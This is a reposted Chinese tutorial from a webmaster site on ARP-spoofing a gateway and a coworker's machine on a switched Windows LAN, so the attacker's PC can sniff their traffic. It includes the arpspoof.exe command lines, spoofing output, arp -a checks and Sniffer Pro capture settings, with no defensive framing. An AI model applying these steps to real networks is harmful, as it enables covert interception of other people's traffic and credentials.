中国站长下载-为中国站长提供最好最全的建站资源! 首 页发布资源有事留言繁體中文
设为首页
加入收藏
联系我们
 
全站首页 站长下载 站长学院 站长博客 连接市场 站长交易 赚钱联盟 站长工具 站长网址 站长论坛
 软件: ASP 源码 | .NET源码 | PHP 源码 | JSP 源码 | CGI 源码 | 网页模板 | 网页素材 | 字体下载 | 工具软件 | 服务器类 | 书籍教程
 文章: 网页编程 | 网页制作 | 数据库区 | 服务器区 | 网络安全 | 网站运营 | 图形图象
您当前的位置:中国站长下载 -> 文章中心 -> 网络安全 -> 基础知识 -> 文章内容  虚拟主机 域名注册 退出登录 用户管理
栏目导航
· 基础知识 · 安全防范
· 防 火 墙 · 其他相关
热门文章
· sndvol32 - sndvol3...
· [组图] FLASH:《大话李白》...
· 个人网站到底能赚多...
· [图文] Rundll.exe是病毒吗...
· [组图] Flash:制作MV
· 价值12万元的网站SE...
· 网站创业者,你需要...
· 一个成功的网站设计...
· [图文] FLASH:韩国导航条解...
· 中国网站的赚钱模式...
相关文章
· [组图] Windows XP系统 SP2...
· [组图] 系统安全:谈Window...
· Windows XP系统安全...
· 取消Windows信使服务...
· Windows下的PHP5.0安...
· Windows下PHP5和Apa...
· Windows中安装Apach...
· Windows 2000下PHP服...
· 使用PHP往Windows系...
· 用C#编写发手机中文...
Windows交换环境中ARP Sniffer的实现
作者:郁郁小蝎  来源:中国站长学院  发布时间:2006-5-19 14:17:36  发布人:chinazhan

 减小字体 增大字体

根据交换环境中Sniffer实现的原理(详见交换环境下Sniffer的实现),我写了一个类似于Linux环境下的ArpSpoof实现在Windows环境下的Arp Sniffer。
  
  在交换环境下Windows中实现Sniffer需要具备的条件:
  
  1、安装Winpcap驱动。
  
  2、我写了一个类似于Linux环境下的ArpSpoof(我只在Windows 2000 Server下测试过,其他期待您的测试)。
  
  3、一个Sniffer,如NetXray或者NAI Sniffer Pro(推荐)。
  
  具体的实现方法:
  
  使用ArpSpoof实现基于ARP的欺骗:
  
  C:\>arpspoof.exe
  ARPSpoof, by netXeyes, Special Thanks BB
  www.netXeyes.com 2002, dansnow@21cn.com
  
  Usage: ArpSpoof [Spoof IP1] [Spoof IP2] [Own IP]
   
  
  其中Spoof IP1和Spoof IP2是想要进行欺骗和嗅探的IP地址,Own IP是自己的IP地址(注意这三个IP必须是在同一个局域网内没有跨越交换机或者路由器)。
  
  例如目前公司的局域网环境为192.168.0.xxx,子网掩码为255.255.255.0,网关为192.168.0.1。我们的IP为192.168.0.29,想要Sniffer 192.168.0.2的数据包。
  
  由于网关为192.168.0.1,所以我们就只要欺骗192.168.0.1和192.168.0.2就可以了。也就是说告诉192.168.0.1,192.168.0.2的MAC地址是自己(192.168.0.29);然后再告诉192.168.0.2, 192.168.0.1的MAC地址是自己(192.168.0.29)。这样以来所有的数据包都会发到192.168.0.29,并且由192.168.0.29实现转发(windows 2000默认可以进行包转发,至于Windows 9.x和Windows NT/XP我没有测试过,希望您可以告诉我)。
  
  C:\>arpspoof.exe 192.168.0.1 192.168.0.2 192.168.0.29
  ARPSpoof, by netXeyes, Special Thanks BB
  www.netXeyes.com 2002, dansnow@21cn.com
  
  Begin Spoof.........
  
  Spoof 192.168.0.1: Mac of 192.168.0.2 ===> Mac of 192.168.0.29
  Spoof 192.168.0.2: Mac of 192.168.0.1 ===> Mac of 192.168.0.29
  Spoof 192.168.0.1: Mac of 192.168.0.2 ===> Mac of 192.168.0.29
  Spoof 192.168.0.2: Mac of 192.168.0.1 ===> Mac of 192.168.0.29
  Spoof 192.168.0.1: Mac of 192.168.0.2 ===> Mac of 192.168.0.29
  Spoof 192.168.0.2: Mac of 192.168.0.1 ===> Mac of 192.168.0.29
  .....................................................
  
  是时候对192.168.0.1和192.168.0.2的ARP欺骗就开始了,在192.168.0.1上面使用arp -a命令可以看到192.168.0.2和192.168.0.29的MAC地址是一样的。
  
  C:\>arp -a
  
  Interface: 192.168.0.1 on Interface 0x1000004
  Internet Address Physical Address Type
  192.168.0.2 00-00-86-61-6b-4e dynamic
  192.168.0.29 00-00-86-61-6b-4e dynamic
  
  同样在192.168.0.2上面也会发现192.168.0.1和192.168.0.29的MAC地址是一样的。
  
  这样我们就在192.168.0.1和192.168.0.2之间实现了ARP欺骗。
  
  启动Sniffer Pro,在Define Filter里面的Address Type中选择Hardware(注意不要选为通常的类型IP,否则抓不到什么有意义的东西),Station1和Station2选择设置为Any即可。
  
  
  这时候就开始Sniffer了。
  
  
  以上结果在我局域网环境中测试通过,不保证适用于所有的环境。
 
[] [返回上一页] [打 印] [收 藏]
∷相关文章评论∷    (评论内容只代表网友观点,与本站立场无关!) [更多评论...]
中国站长下载
中国站长下载

 本页只接受PR>=4 IT类站点连接,申请连接,谢谢您们的支持!希望我们的下载站能够真正帮到中国的站长们!
关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地图
Copyright © 2005-2006 ChinaZhan.Net. All Rights Reserved .